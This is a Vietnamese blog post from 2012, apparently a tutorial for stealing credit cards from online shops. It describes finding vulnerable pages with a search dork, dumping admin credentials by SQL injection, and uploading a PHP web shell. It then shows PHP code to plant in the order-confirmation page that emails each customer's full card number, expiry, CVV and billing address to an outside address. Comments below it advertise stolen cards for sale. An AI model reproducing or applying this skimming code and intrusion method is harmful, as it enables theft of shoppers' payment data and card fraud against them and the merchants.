Thứ Hai, 23 tháng 7, 2012
TUT Hack CC
allinurl: /sub.php?Page=1chuyển về dạng
http://abc.com/detail.php?pid=....hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được
get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)
link admin
http://abc.com/admin_login.phpvào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích
http://abc.com/cp
tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php
vào shell tìm file đó
sau đó tìm đoạn này
<? echothường thì code gốc là hiện 4 số cuối của cc
"" . substr($card_no,-4) . "<br>" .
$ex_month . "/" . $ex_year . "<br>" .
$cid;
?>
sửa số màu đỏ thành số 0
sau đó gán thêm hàm này vào phía dưới
<?notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%
$to = 'tmtno1@vnhack.us';
$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>
có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất
Đăng ký:
Đăng Nhận xét (Atom)
Nhận xét này đã bị tác giả xóa.
Trả lờiXóasell ccv ,ccn
Trả lờiXóa1$/ccv
0.3$/ccn
yahoo: sell_ccliveonline